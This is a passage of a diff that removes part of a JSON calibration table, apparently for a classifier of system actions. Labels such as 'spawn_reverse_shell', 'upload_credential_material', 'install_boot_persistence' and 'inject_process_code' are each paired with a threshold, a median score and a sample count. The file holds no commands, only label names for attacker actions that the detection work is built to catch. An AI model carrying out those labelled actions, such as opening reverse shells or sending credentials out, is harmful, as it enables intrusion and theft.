- "tp_samples": 116
748
- },
749
- "grant_user_privilege": {
750
- "threshold": 0.6376,
751
- "tp_p50": 0.7965,
752
- "tp_samples": 153
753
- },
754
- "import_database_dump": {
755
- "threshold": 0.6219,
756
- "tp_p50": 0.7356,
757
- "tp_samples": 253
758
- },
759
- "import_ssh_key": {
760
- "threshold": 0.7656,
761
- "tp_p50": 0.789,
762
- "tp_samples": 118
763
- },
764
- "increase_file_permission": {
765
- "threshold": 0.5329,
766
- "tp_p50": 0.6577,
767
- "tp_samples": 529
768
- },
769
- "initialize_infrastructure_template": {
770
- "threshold": 0.6989,
771
- "tp_p50": 0.7703,
772
- "tp_samples": 116
773
- },
774
- "inject_process_code": {
775
- "threshold": 0.6645,
776
- "tp_p50": 0.7444,
777
- "tp_samples": 105
778
- },
779
- "inspect_audit_policy": {
780
- "threshold": 0.6796,
781
- "tp_p50": 0.8039,
782
- "tp_samples": 118
783
- },
784
- "inspect_auth_policy": {
785
- "threshold": 0.6704,
786
- "tp_p50": 0.7663,
787
- "tp_samples": 190
788
- },
789
- "inspect_container_image": {
790
- "threshold": 0.6885,
791
- "tp_p50": 0.7663,
792
- "tp_samples": 229
793
- },
794
- "inspect_container_runtime": {
795
- "threshold": 0.6332,
796
- "tp_p50": 0.743,
797
- "tp_samples": 249
798
- },
799
- "inspect_current_identity": {
800
- "threshold": 0.5551,
801
- "tp_p50": 0.6526,
802
- "tp_samples": 500
803
- },
804
- "inspect_current_privileges": {
805
- "threshold": 0.6355,
806
- "tp_p50": 0.748,
807
- "tp_samples": 119
808
- },
809
- "inspect_ebpf_program": {
810
- "threshold": 0.7264,
811
- "tp_p50": 0.8048,
812
- "tp_samples": 121
813
- },
814
- "inspect_file_metadata": {
815
- "threshold": 0.5939,
816
- "tp_p50": 0.7559,
817
- "tp_samples": 1368
818
- },
819
- "inspect_firewall_policy": {
820
- "threshold": 0.7129,
821
- "tp_p50": 0.8216,
822
- "tp_samples": 447
823
- },
824
- "inspect_infrastructure_service": {
825
- "threshold": 0.572,
826
- "tp_p50": 0.7226,
827
- "tp_samples": 1301
828
- },
829
- "inspect_kernel_module": {
830
- "threshold": 0.7201,
831
- "tp_p50": 0.8277,
832
- "tp_samples": 117
833
- },
834
- "inspect_local_kubernetes_cluster": {
835
- "threshold": 0.7001,
836
- "tp_p50": 0.7735,
837
- "tp_samples": 102
838
- },
839
- "inspect_mail_queue": {
840
- "threshold": 0.7124,
841
- "tp_p50": 0.7646,
842
- "tp_samples": 114
843
- },
844
- "inspect_network_state": {
845
- "threshold": 0.7274,
846
- "tp_p50": 0.8479,
847
- "tp_samples": 955
848
- },
849
- "inspect_process_runtime_attributes": {
850
- "threshold": 0.6744,
851
- "tp_p50": 0.7603,
852
- "tp_samples": 365
853
- },
854
- "inspect_service": {
855
- "threshold": 0.6139,
856
- "tp_p50": 0.7854,
857
- "tp_samples": 685
858
- },
859
- "inspect_storage_state": {
860
- "threshold": 0.6111,
861
- "tp_p50": 0.7925,
862
- "tp_samples": 1272
863
- },
864
- "inspect_system_state": {
865
- "threshold": 0.5595,
866
- "tp_p50": 0.7152,
867
- "tp_samples": 1289
868
- },
869
- "inspect_workload": {
870
- "threshold": 0.6707,
871
- "tp_p50": 0.7906,
872
- "tp_samples": 456
873
- },
874
- "install_boot_persistence": {
875
- "threshold": 0.6708,
876
- "tp_p50": 0.7624,
877
- "tp_samples": 103
878
- },
879
- "install_package": {
880
- "threshold": 0.5951,
881
- "tp_p50": 0.7734,
882
- "tp_samples": 751
883
- },
884
- "listen_local_port": {
885
- "threshold": 0.6455,
886
- "tp_p50": 0.6996,
887
- "tp_samples": 130
888
- },
889
- "listen_network_port": {
890
- "threshold": 0.5917,
891
- "tp_p50": 0.6887,
892
- "tp_samples": 364
893
- },
894
- "load_ebpf_program": {
895
- "threshold": 0.6753,
896
- "tp_p50": 0.7496,
897
- "tp_samples": 161
898
- },
899
- "load_kernel_module": {
900
- "threshold": 0.6787,
901
- "tp_p50": 0.8112,
902
- "tp_samples": 133
903
- },
904
- "manage_data_processing_job": {
905
- "threshold": 0.5769,
906
- "tp_p50": 0.6949,
907
- "tp_samples": 961
908
- },
909
- "manage_database_backup": {
910
- "threshold": 0.5461,
911
- "tp_p50": 0.6699,
912
- "tp_samples": 535
913
- },
914
- "manage_infrastructure_backup": {
915
- "threshold": 0.5567,
916
- "tp_p50": 0.6702,
917
- "tp_samples": 628
918
- },
919
- "manage_snapshot": {
920
- "threshold": 0.633,
921
- "tp_p50": 0.7265,
922
- "tp_samples": 171
923
- },
924
- "manage_virtual_machine": {
925
- "threshold": 0.6352,
926
- "tp_p50": 0.721,
927
- "tp_samples": 177
928
- },
929
- "manage_vpn_connection": {
930
- "threshold": 0.6876,
931
- "tp_p50": 0.7393,
932
- "tp_samples": 129
933
- },
934
- "modify_audit_policy": {
935
- "threshold": 0.673,
936
- "tp_p50": 0.7862,
937
- "tp_samples": 139
938
- },
939
- "modify_auth_policy": {
940
- "threshold": 0.6065,
941
- "tp_p50": 0.712,
942
- "tp_samples": 143
943
- },
944
- "modify_bootloader": {
945
- "threshold": 0.6558,
946
- "tp_p50": 0.7349,
947
- "tp_samples": 113
948
- },
949
- "modify_business_config": {
950
- "threshold": 0.6255,
951
- "tp_p50": 0.7282,
952
- "tp_samples": 93
953
- },
954
- "modify_cache_data": {
955
- "threshold": 0.6291,
956
- "tp_p50": 0.7223,
957
- "tp_samples": 91
958
- },
959
- "modify_cloud_firewall": {
960
- "threshold": 0.7522,
961
- "tp_p50": 0.7984,
962
- "tp_samples": 135
963
- },
964
- "modify_cloud_identity": {
965
- "threshold": 0.7157,
966
- "tp_p50": 0.7793,
967
- "tp_samples": 100
968
- },
969
- "modify_cloud_identity_policy": {
970
- "threshold": 0.7051,
971
- "tp_p50": 0.7559,
972
- "tp_samples": 115
973
- },
974
- "modify_cloud_resource": {
975
- "threshold": 0.6439,
976
- "tp_p50": 0.727,
977
- "tp_samples": 129
978
- },
979
- "modify_cloud_secret": {
980
- "threshold": 0.7041,
981
- "tp_p50": 0.7499,
982
- "tp_samples": 129
983
- },
984
- "modify_cluster_auth_policy": {
985
- "threshold": 0.6812,
986
- "tp_p50": 0.7617,
987
- "tp_samples": 243
988
- },
989
- "modify_cluster_secret": {
990
- "threshold": 0.7642,
991
- "tp_p50": 0.8294,
992
- "tp_samples": 144
993
- },
994
- "modify_container_network": {
995
- "threshold": 0.638,
996
- "tp_p50": 0.7424,
997
- "tp_samples": 118
998
- },
999
- "modify_container_state": {
1000
- "threshold": 0.6873,
1001
- "tp_p50": 0.7834,
1002
- "tp_samples": 126
1003
- },
1004
- "modify_coordination_data": {
1005
- "threshold": 0.6861,
1006
- "tp_p50": 0.7466,
1007
- "tp_samples": 151
1008
- },
1009
- "modify_critical_system_path": {
1010
- "threshold": 0.5731,
1011
- "tp_p50": 0.6635,
1012
- "tp_samples": 115
1013
- },
1014
- "modify_database_account": {
1015
- "threshold": 0.6739,
1016
- "tp_p50": 0.7816,
1017
- "tp_samples": 126
1018
- },
1019
- "modify_database_data": {
1020
- "threshold": 0.6065,
1021
- "tp_p50": 0.7645,
1022
- "tp_samples": 333
1023
- },
1024
- "modify_database_replication": {
1025
- "threshold": 0.6684,
1026
- "tp_p50": 0.7543,
1027
- "tp_samples": 123
1028
- },
1029
- "modify_database_schema": {
1030
- "threshold": 0.6628,
1031
- "tp_p50": 0.7912,
1032
- "tp_samples": 201
1033
- },
1034
- "modify_dns_config": {
1035
- "threshold": 0.6421,
1036
- "tp_p50": 0.7378,
1037
- "tp_samples": 133
1038
- },
1039
- "modify_dynamic_loader": {
1040
- "threshold": 0.7476,
1041
- "tp_p50": 0.8144,
1042
- "tp_samples": 110
1043
- },
1044
- "modify_file_acl": {
1045
- "threshold": 0.7438,
1046
- "tp_p50": 0.8049,
1047
- "tp_samples": 127
1048
- },
1049
- "modify_file_permission": {
1050
- "threshold": 0.5536,
1051
- "tp_p50": 0.7175,
1052
- "tp_samples": 476
1053
- },
1054
- "modify_file_timestamp": {
1055
- "threshold": 0.6799,
1056
- "tp_p50": 0.7714,
1057
- "tp_samples": 178
1058
- },
1059
- "modify_firewall_policy": {
1060
- "threshold": 0.7208,
1061
- "tp_p50": 0.7997,
1062
- "tp_samples": 582
1063
- },
1064
- "modify_group_identity": {
1065
- "threshold": 0.6993,
1066
- "tp_p50": 0.7892,
1067
- "tp_samples": 126
1068
- },
1069
- "modify_group_membership": {
1070
- "threshold": 0.6811,
1071
- "tp_p50": 0.7655,
1072
- "tp_samples": 363
1073
- },
1074
- "modify_infrastructure_account": {
1075
- "threshold": 0.6202,
1076
- "tp_p50": 0.7106,
1077
- "tp_samples": 153
1078
- },
1079
- "modify_infrastructure_config": {
1080
- "threshold": 0.517,
1081
- "tp_p50": 0.6848,
1082
- "tp_samples": 1085
1083
- },
1084
- "modify_kernel_memory": {
1085
- "threshold": 0.7833,
1086
- "tp_p50": 0.8242,
1087
- "tp_samples": 100
1088
- },
1089
- "modify_kernel_parameter": {
1090
- "threshold": 0.6275,
1091
- "tp_p50": 0.7837,
1092
- "tp_samples": 133
1093
- },
1094
- "modify_language_dependency": {
1095
- "threshold": 0.6477,
1096
- "tp_p50": 0.7255,
1097
- "tp_samples": 242
1098
- },
1099
- "modify_library_preload": {
1100
- "threshold": 0.7431,
1101
- "tp_p50": 0.8485,
1102
- "tp_samples": 127
1103
- },
1104
- "modify_mail_queue": {
1105
- "threshold": 0.7433,
1106
- "tp_p50": 0.7864,
1107
- "tp_samples": 112
1108
- },
1109
- "modify_mount_state": {
1110
- "threshold": 0.6737,
1111
- "tp_p50": 0.8142,
1112
- "tp_samples": 192
1113
- },
1114
- "modify_object_storage": {
1115
- "threshold": 0.6752,
1116
- "tp_p50": 0.7456,
1117
- "tp_samples": 138
1118
- },
1119
- "modify_package_execution_hook": {
1120
- "threshold": 0.6732,
1121
- "tp_p50": 0.7588,
1122
- "tp_samples": 129
1123
- },
1124
- "modify_pam_policy": {
1125
- "threshold": 0.6691,
1126
- "tp_p50": 0.8023,
1127
- "tp_samples": 121
1128
- },
1129
- "modify_process_memory": {
1130
- "threshold": 0.689,
1131
- "tp_p50": 0.779,
1132
- "tp_samples": 113
1133
- },
1134
- "modify_process_runtime_attributes": {
1135
- "threshold": 0.5753,
1136
- "tp_p50": 0.6802,
1137
- "tp_samples": 267
1138
- },
1139
- "modify_repository_hook": {
1140
- "threshold": 0.6592,
1141
- "tp_p50": 0.7283,
1142
- "tp_samples": 122
1143
- },
1144
- "modify_route": {
1145
- "threshold": 0.6932,
1146
- "tp_p50": 0.7889,
1147
- "tp_samples": 209
1148
- },
1149
- "modify_scheduled_task": {
1150
- "threshold": 0.6497,
1151
- "tp_p50": 0.7293,
1152
- "tp_samples": 232
1153
- },
1154
- "modify_security_module_policy": {
1155
- "threshold": 0.6747,
1156
- "tp_p50": 0.7325,
1157
- "tp_samples": 114
1158
- },
1159
- "modify_service_state": {
1160
- "threshold": 0.54,
1161
- "tp_p50": 0.6781,
1162
- "tp_samples": 1459
1163
- },
1164
- "modify_shell_history": {
1165
- "threshold": 0.6489,
1166
- "tp_p50": 0.7942,
1167
- "tp_samples": 121
1168
- },
1169
- "modify_shell_startup": {
1170
- "threshold": 0.6464,
1171
- "tp_p50": 0.7481,
1172
- "tp_samples": 112
1173
- },
1174
- "modify_source_code": {
1175
- "threshold": 0.6366,
1176
- "tp_p50": 0.7607,
1177
- "tp_samples": 297
1178
- },
1179
- "modify_source_repository": {
1180
- "threshold": 0.6355,
1181
- "tp_p50": 0.7734,
1182
- "tp_samples": 241
1183
- },
1184
- "modify_ssh_authorization": {
1185
- "threshold": 0.5857,
1186
- "tp_p50": 0.691,
1187
- "tp_samples": 165
1188
- },
1189
- "modify_ssh_policy": {
1190
- "threshold": 0.6132,
1191
- "tp_p50": 0.7817,
1192
- "tp_samples": 143
1193
- },
1194
- "modify_startup_script": {
1195
- "threshold": 0.7247,
1196
- "tp_p50": 0.7841,
1197
- "tp_samples": 109
1198
- },
1199
- "modify_storage_volume": {
1200
- "threshold": 0.638,
1201
- "tp_p50": 0.7401,
1202
- "tp_samples": 337
1203
- },
1204
- "modify_sudo_policy": {
1205
- "threshold": 0.6521,
1206
- "tp_p50": 0.785,
1207
- "tp_samples": 155
1208
- },
1209
- "modify_swap_state": {
1210
- "threshold": 0.7065,
1211
- "tp_p50": 0.8236,
1212
- "tp_samples": 119
1213
- },
1214
- "modify_symlink": {
1215
- "threshold": 0.6241,
1216
- "tp_p50": 0.7017,
1217
- "tp_samples": 162
1218
- },
1219
- "modify_system_config": {
1220
- "threshold": 0.6712,
1221
- "tp_p50": 0.7702,
1222
- "tp_samples": 317
1223
- },
1224
- "modify_system_time": {
1225
- "threshold": 0.7395,
1226
- "tp_p50": 0.8093,
1227
- "tp_samples": 125
1228
- },
1229
- "modify_systemd_unit": {
1230
- "threshold": 0.6609,
1231
- "tp_p50": 0.7728,
1232
- "tp_samples": 111
1233
- },
1234
- "modify_trust_store": {
1235
- "threshold": 0.6749,
1236
- "tp_p50": 0.7347,
1237
- "tp_samples": 137
1238
- },
1239
- "modify_user_access_state": {
1240
- "threshold": 0.6771,
1241
- "tp_p50": 0.7416,
1242
- "tp_samples": 207
1243
- },
1244
- "modify_user_identity": {
1245
- "threshold": 0.668,
1246
- "tp_p50": 0.7582,
1247
- "tp_samples": 105
1248
- },
1249
- "modify_verification_material": {
1250
- "threshold": 0.5682,
1251
- "tp_p50": 0.6479,
1252
- "tp_samples": 252
1253
- },
1254
- "modify_workload": {
1255
- "threshold": 0.6247,
1256
- "tp_p50": 0.7595,
1257
- "tp_samples": 753
1258
- },
1259
- "mount_host_into_container": {
1260
- "threshold": 0.5725,
1261
- "tp_p50": 0.6343,
1262
- "tp_samples": 161
1263
- },
1264
- "mount_remote_filesystem": {
1265
- "threshold": 0.7129,
1266
- "tp_p50": 0.8175,
1267
- "tp_samples": 129
1268
- },
1269
- "open_data_service_session": {
1270
- "threshold": 0.6567,
1271
- "tp_p50": 0.7699,
1272
- "tp_samples": 231
1273
- },
1274
- "perform_dns_zone_transfer": {
1275
- "threshold": 0.6909,
1276
- "tp_p50": 0.7905,
1277
- "tp_samples": 115
1278
- },
1279
- "plan_infrastructure_template": {
1280
- "threshold": 0.6305,
1281
- "tp_p50": 0.7397,
1282
- "tp_samples": 440
1283
- },
1284
- "port_forward_workload": {
1285
- "threshold": 0.6883,
1286
- "tp_p50": 0.8361,
1287
- "tp_samples": 157
1288
- },
1289
- "probe_database_service": {
1290
- "threshold": 0.6405,
1291
- "tp_p50": 0.7953,
1292
- "tp_samples": 415
1293
- },
1294
- "probe_multiple_endpoints": {
1295
- "threshold": 0.6461,
1296
- "tp_p50": 0.8002,
1297
- "tp_samples": 197
1298
- },
1299
- "probe_multiple_endpoints_multiple_ports": {
1300
- "threshold": 0.717,
1301
- "tp_p50": 0.8362,
1302
- "tp_samples": 272
1303
- },
1304
- "probe_multiple_endpoints_single_port": {
1305
- "threshold": 0.6594,
1306
- "tp_p50": 0.765,
1307
- "tp_samples": 191
1308
- },
1309
- "probe_remote_access_service": {
1310
- "threshold": 0.6128,
1311
- "tp_p50": 0.7295,
1312
- "tp_samples": 243
1313
- },
1314
- "probe_single_endpoint": {
1315
- "threshold": 0.7619,
1316
- "tp_p50": 0.8343,
1317
- "tp_samples": 457
1318
- },
1319
- "probe_single_endpoint_multiple_ports": {
1320
- "threshold": 0.6794,
1321
- "tp_p50": 0.7742,
1322
- "tp_samples": 274
1323
- },
1324
- "probe_single_endpoint_single_port": {
1325
- "threshold": 0.6609,
1326
- "tp_p50": 0.76,
1327
- "tp_samples": 354
1328
- },
1329
- "probe_web_application": {
1330
- "threshold": 0.6143,
1331
- "tp_p50": 0.7352,
1332
- "tp_samples": 598
1333
- },
1334
- "publish_message": {
1335
- "threshold": 0.6201,
1336
- "tp_p50": 0.7342,
1337
- "tp_samples": 171
1338
- },
1339
- "publish_source_repository": {
1340
- "threshold": 0.6537,
1341
- "tp_p50": 0.789,
1342
- "tp_samples": 121
1343
- },
1344
- "query_cache_data": {
1345
- "threshold": 0.6533,
1346
- "tp_p50": 0.7578,
1347
- "tp_samples": 168
1348
- },
1349
- "query_cloud_audit": {
1350
- "threshold": 0.7376,
1351
- "tp_p50": 0.8044,
1352
- "tp_samples": 173
1353
- },
1354
- "query_cloud_database": {
1355
- "threshold": 0.781,
1356
- "tp_p50": 0.8224,
1357
- "tp_samples": 104
1358
- },
1359
- "query_database_data": {
1360
- "threshold": 0.6365,
1361
- "tp_p50": 0.7773,
1362
- "tp_samples": 725
1363
- },
1364
- "query_dns_records": {
1365
- "threshold": 0.7176,
1366
- "tp_p50": 0.8202,
1367
- "tp_samples": 695
1368
- },
1369
- "query_service_health": {
1370
- "threshold": 0.5815,
1371
- "tp_p50": 0.7661,
1372
- "tp_samples": 1155
1373
- },
1374
- "read_auth_audit_log": {
1375
- "threshold": 0.5815,
1376
- "tp_p50": 0.7166,
1377
- "tp_samples": 401
1378
- },
1379
- "read_auth_policy": {
1380
- "threshold": 0.5913,
1381
- "tp_p50": 0.708,
1382
- "tp_samples": 255
1383
- },
1384
- "read_business_config": {
1385
- "threshold": 0.573,
1386
- "tp_p50": 0.7066,
1387
- "tp_samples": 556
1388
- },
1389
- "read_business_data": {
1390
- "threshold": 0.5044,
1391
- "tp_p50": 0.5981,
1392
- "tp_samples": 1378
1393
- },
1394
- "read_business_log": {
1395
- "threshold": 0.593,
1396
- "tp_p50": 0.8009,
1397
- "tp_samples": 662
1398
- },
1399
- "read_cloud_credentials": {
1400
- "threshold": 0.5766,
1401
- "tp_p50": 0.6589,
1402
- "tp_samples": 199
1403
- },
1404
- "read_cloud_metadata": {
1405
- "threshold": 0.6711,
1406
- "tp_p50": 0.7561,
1407
- "tp_samples": 121
1408
- },
1409
- "read_cloud_secret": {
1410
- "threshold": 0.6307,
1411
- "tp_p50": 0.824,
1412
- "tp_samples": 189
1413
- },
1414
- "read_cluster_context": {
1415
- "threshold": 0.5555,
1416
- "tp_p50": 0.6431,
1417
- "tp_samples": 186
1418
- },
1419
- "read_cluster_secret": {
1420
- "threshold": 0.612,
1421
- "tp_p50": 0.8,
1422
- "tp_samples": 197
1423
- },
1424
- "read_container_secret": {
1425
- "threshold": 0.5712,
1426
- "tp_p50": 0.6793,
1427
- "tp_samples": 180
1428
- },
1429
- "read_coordination_data": {
1430
- "threshold": 0.7039,
1431
- "tp_p50": 0.7474,
1432
- "tp_samples": 158
1433
- },
1434
- "read_credential_material": {
1435
- "threshold": 0.45,
1436
- "tp_p50": 0.539,
1437
- "tp_samples": 4514
1438
- },
1439
- "read_environment_variables": {
1440
- "threshold": 0.5342,
1441
- "tp_p50": 0.6371,
1442
- "tp_samples": 452
1443
- },
1444
- "read_identity_data": {
1445
- "threshold": 0.5427,
1446
- "tp_p50": 0.6972,
1447
- "tp_samples": 836
1448
- },
1449
- "read_infrastructure_config": {
1450
- "threshold": 0.4802,
1451
- "tp_p50": 0.597,
1452
- "tp_samples": 3428
1453
- },
1454
- "read_infrastructure_log": {
1455
- "threshold": 0.5814,
1456
- "tp_p50": 0.7718,
1457
- "tp_samples": 863
1458
- },
1459
- "read_kernel_memory": {
1460
- "threshold": 0.6746,
1461
- "tp_p50": 0.7444,
1462
- "tp_samples": 106
1463
- },
1464
- "read_kernel_parameter": {
1465
- "threshold": 0.7379,
1466
- "tp_p50": 0.8214,
1467
- "tp_samples": 128
1468
- },
1469
- "read_kernel_state": {
1470
- "threshold": 0.6215,
1471
- "tp_p50": 0.7531,
1472
- "tp_samples": 214
1473
- },
1474
- "read_login_history": {
1475
- "threshold": 0.6663,
1476
- "tp_p50": 0.8171,
1477
- "tp_samples": 245
1478
- },
1479
- "read_mailbox": {
1480
- "threshold": 0.6736,
1481
- "tp_p50": 0.7956,
1482
- "tp_samples": 126
1483
- },
1484
- "read_packet_capture": {
1485
- "threshold": 0.6958,
1486
- "tp_p50": 0.7678,
1487
- "tp_samples": 173
1488
- },
1489
- "read_process_memory": {
1490
- "threshold": 0.5784,
1491
- "tp_p50": 0.6404,
1492
- "tp_samples": 236
1493
- },
1494
- "read_process_runtime": {
1495
- "threshold": 0.6308,
1496
- "tp_p50": 0.7139,
1497
- "tp_samples": 82
1498
- },
1499
- "read_scheduled_task": {
1500
- "threshold": 0.596,
1501
- "tp_p50": 0.7036,
1502
- "tp_samples": 410
1503
- },
1504
- "read_secret_store": {
1505
- "threshold": 0.6412,
1506
- "tp_p50": 0.7354,
1507
- "tp_samples": 217
1508
- },
1509
- "read_service_metrics": {
1510
- "threshold": 0.6333,
1511
- "tp_p50": 0.7737,
1512
- "tp_samples": 858
1513
- },
1514
- "read_shell_history": {
1515
- "threshold": 0.6107,
1516
- "tp_p50": 0.7245,
1517
- "tp_samples": 215
1518
- },
1519
- "read_source_code": {
1520
- "threshold": 0.549,
1521
- "tp_p50": 0.6913,
1522
- "tp_samples": 1112
1523
- },
1524
- "read_source_repository": {
1525
- "threshold": 0.601,
1526
- "tp_p50": 0.7912,
1527
- "tp_samples": 469
1528
- },
1529
- "read_ssh_policy": {
1530
- "threshold": 0.5349,
1531
- "tp_p50": 0.6313,
1532
- "tp_samples": 479
1533
- },
1534
- "read_sudo_policy": {
1535
- "threshold": 0.6356,
1536
- "tp_p50": 0.7335,
1537
- "tp_samples": 264
1538
- },
1539
- "read_system_audit_log": {
1540
- "threshold": 0.6108,
1541
- "tp_p50": 0.7247,
1542
- "tp_samples": 215
1543
- },
1544
- "read_system_config": {
1545
- "threshold": 0.5395,
1546
- "tp_p50": 0.6907,
1547
- "tp_samples": 557
1548
- },
1549
- "read_system_log": {
1550
- "threshold": 0.5752,
1551
- "tp_p50": 0.7797,
1552
- "tp_samples": 455
1553
- },
1554
- "read_verification_material": {
1555
- "threshold": 0.5356,
1556
- "tp_p50": 0.686,
1557
- "tp_samples": 713
1558
- },
1559
- "read_workload_logs": {
1560
- "threshold": 0.6746,
1561
- "tp_p50": 0.8214,
1562
- "tp_samples": 474
1563
- },
1564
- "reboot_host": {
1565
- "threshold": 0.6714,
1566
- "tp_p50": 0.7429,
1567
- "tp_samples": 122
1568
- },
1569
- "recover_deleted_content": {
1570
- "threshold": 0.6919,
1571
- "tp_p50": 0.7543,
1572
- "tp_samples": 111
1573
- },
1574
- "remove_file_capability": {
1575
- "threshold": 0.8531,
1576
- "tp_p50": 0.8878,
1577
- "tp_samples": 105
1578
- },
1579
- "remove_immutable_file_attribute": {
1580
- "threshold": 0.7735,
1581
- "tp_p50": 0.8178,
1582
- "tp_samples": 110
1583
- },
1584
- "renew_access_token": {
1585
- "threshold": 0.6825,
1586
- "tp_p50": 0.7983,
1587
- "tp_samples": 104
1588
- },
1589
- "resize_filesystem": {
1590
- "threshold": 0.745,
1591
- "tp_p50": 0.8272,
1592
- "tp_samples": 111
1593
- },
1594
- "revoke_access_token": {
1595
- "threshold": 0.6846,
1596
- "tp_p50": 0.7537,
1597
- "tp_samples": 112
1598
- },
1599
- "revoke_cloud_privilege": {
1600
- "threshold": 0.7746,
1601
- "tp_p50": 0.836,
1602
- "tp_samples": 126
1603
- },
1604
- "revoke_database_privilege": {
1605
- "threshold": 0.7833,
1606
- "tp_p50": 0.8434,
1607
- "tp_samples": 114
1608
- },
1609
- "revoke_infrastructure_privilege": {
1610
- "threshold": 0.7092,
1611
- "tp_p50": 0.8013,
1612
- "tp_samples": 104
1613
- },
1614
- "revoke_user_privilege": {
1615
- "threshold": 0.8201,
1616
- "tp_p50": 0.8396,
1617
- "tp_samples": 105
1618
- },
1619
- "run_performance_test": {
1620
- "threshold": 0.6329,
1621
- "tp_p50": 0.747,
1622
- "tp_samples": 251
1623
- },
1624
- "scan_container_image": {
1625
- "threshold": 0.6877,
1626
- "tp_p50": 0.7855,
1627
- "tp_samples": 157
1628
- },
1629
- "search_capability_files": {
1630
- "threshold": 0.7841,
1631
- "tp_p50": 0.8165,
1632
- "tp_samples": 118
1633
- },
1634
- "search_credentials": {
1635
- "threshold": 0.5261,
1636
- "tp_p50": 0.6297,
1637
- "tp_samples": 1488
1638
- },
1639
- "search_sensitive_files": {
1640
- "threshold": 0.629,
1641
- "tp_p50": 0.7257,
1642
- "tp_samples": 224
1643
- },
1644
- "search_sgid_files": {
1645
- "threshold": 0.7293,
1646
- "tp_p50": 0.7849,
1647
- "tp_samples": 108
1648
- },
1649
- "search_suid_files": {
1650
- "threshold": 0.7008,
1651
- "tp_p50": 0.7931,
1652
- "tp_samples": 131
1653
- },
1654
- "search_world_writable_files": {
1655
- "threshold": 0.7411,
1656
- "tp_p50": 0.7918,
1657
- "tp_samples": 120
1658
- },
1659
- "securely_delete_data": {
1660
- "threshold": 0.6477,
1661
- "tp_p50": 0.7378,
1662
- "tp_samples": 163
1663
- },
1664
- "send_mail": {
1665
- "threshold": 0.6474,
1666
- "tp_p50": 0.7676,
1667
- "tp_samples": 119
1668
- },
1669
- "send_multiplexer_input": {
1670
- "threshold": 0.7005,
1671
- "tp_p50": 0.7629,
1672
- "tp_samples": 104
1673
- },
1674
- "set_environment_variable": {
1675
- "threshold": 0.5429,
1676
- "tp_p50": 0.6587,
1677
- "tp_samples": 379
1678
- },
1679
- "set_file_capability": {
1680
- "threshold": 0.7549,
1681
- "tp_p50": 0.8531,
1682
- "tp_samples": 118
1683
- },
1684
- "set_immutable_file_attribute": {
1685
- "threshold": 0.7521,
1686
- "tp_p50": 0.8391,
1687
- "tp_samples": 124
1688
- },
1689
- "set_sgid_permission": {
1690
- "threshold": 0.7021,
1691
- "tp_p50": 0.8087,
1692
- "tp_samples": 106
1693
- },
1694
- "set_suid_permission": {
1695
- "threshold": 0.6472,
1696
- "tp_p50": 0.8004,
1697
- "tp_samples": 136
1698
- },
1699
- "shutdown_host": {
1700
- "threshold": 0.7429,
1701
- "tp_p50": 0.8095,
1702
- "tp_samples": 101
1703
- },
1704
- "sign_artifact": {
1705
- "threshold": 0.6007,
1706
- "tp_p50": 0.7622,
1707
- "tp_samples": 194
1708
- },
1709
- "simulate_package_install": {
1710
- "threshold": 0.6904,
1711
- "tp_p50": 0.7734,
1712
- "tp_samples": 119
1713
- },
1714
- "spawn_bind_shell": {
1715
- "threshold": 0.6993,
1716
- "tp_p50": 0.7846,
1717
- "tp_samples": 141
1718
- },
1719
- "spawn_interactive_shell": {
1720
- "threshold": 0.6019,
1721
- "tp_p50": 0.7026,
1722
- "tp_samples": 323
1723
- },
1724
- "spawn_reverse_shell": {
1725
- "threshold": 0.6407,
1726
- "tp_p50": 0.762,
1727
- "tp_samples": 157
1728
- },
1729
- "stage_hidden_path": {
1730
- "threshold": 0.475,
1731
- "tp_p50": 0.5506,
1732
- "tp_samples": 1580
1733
- },
1734
- "stage_temporary_path": {
1735
- "threshold": 0.45,
1736
- "tp_p50": 0.5089,
1737
- "tp_samples": 5179
1738
- },
1739
- "switch_user": {
1740
- "threshold": 0.6584,
1741
- "tp_p50": 0.832,
1742
- "tp_samples": 103
1743
- },
1744
- "synchronize_remote_data": {
1745
- "threshold": 0.5402,
1746
- "tp_p50": 0.6308,
1747
- "tp_samples": 641
1748
- },
1749
- "terminate_process": {
1750
- "threshold": 0.6858,
1751
- "tp_p50": 0.8069,
1752
- "tp_samples": 286
1753
- },
1754
- "trace_file_access": {
1755
- "threshold": 0.6703,
1756
- "tp_p50": 0.7392,
1757
- "tp_samples": 125
1758
- },
1759
- "trace_process_execution": {
1760
- "threshold": 0.595,
1761
- "tp_p50": 0.6884,
1762
- "tp_samples": 246
1763
- },
1764
- "train_mail_filter": {
1765
- "threshold": 0.7662,
1766
- "tp_p50": 0.8258,
1767
- "tp_samples": 108
1768
- },
1769
- "transfer_container_image": {
1770
- "threshold": 0.6308,
1771
- "tp_p50": 0.7484,
1772
- "tp_samples": 360
1773
- },
1774
- "uninstall_package": {
1775
- "threshold": 0.7557,
1776
- "tp_p50": 0.8029,
1777
- "tp_samples": 140
1778
- },
1779
- "unload_ebpf_program": {
1780
- "threshold": 0.7393,
1781
- "tp_p50": 0.7854,
1782
- "tp_samples": 106
1783
- },
1784
- "unload_kernel_module": {
1785
- "threshold": 0.7794,
1786
- "tp_p50": 0.855,
1787
- "tp_samples": 112
1788
- },
1789
- "update_package": {
1790
- "threshold": 0.6416,
1791
- "tp_p50": 0.7497,
1792
- "tp_samples": 187
1793
- },
1794
- "update_source_repository": {
1795
- "threshold": 0.6496,
1796
- "tp_p50": 0.7976,
1797
- "tp_samples": 261
1798
- },
1799
- "upload_credential_material": {
1800
- "threshold": 0.5148,
1801
- "tp_p50": 0.6378,
1802
- "tp_samples": 607
1803
- },
1804
- "upload_external_content": {
1805
- "threshold": 0.4733,
1806
- "tp_p50": 0.6018,
1807
- "tp_samples": 1886
1808
- },
1809
- "upload_internal_content": {
1810
- "threshold": 0.5028,
1811
- "tp_p50": 0.6081,
1812
- "tp_samples": 948
1813
- },
1814
- "upload_named_content": {
1815
- "threshold": 0.571,
1816
- "tp_p50": 0.687,
1817
- "tp_samples": 608
1818
- },
1819
- "upload_object_storage": {
1820
- "threshold": 0.5927,
1821
- "tp_p50": 0.6976,
1822
- "tp_samples": 510
1823
- },
1824
- "upload_sensitive_content": {
1825
- "threshold": 0.4861,
1826
- "tp_p50": 0.6173,
1827
- "tp_samples": 1424
1828
- },
1829
- "verify_artifact_integrity": {
1830
- "threshold": 0.6114,
1831
- "tp_p50": 0.738,
1832
- "tp_samples": 624
1833
- },
1834
- "verify_auth_policy": {
1835
- "threshold": 0.6804,
1836
- "tp_p50": 0.7732,
1837
- "tp_samples": 226
1838
- },
1839
- "wipe_storage": {
1840
- "threshold": 0.6448,
1841
- "tp_p50": 0.7406,
1842
- "tp_samples": 114
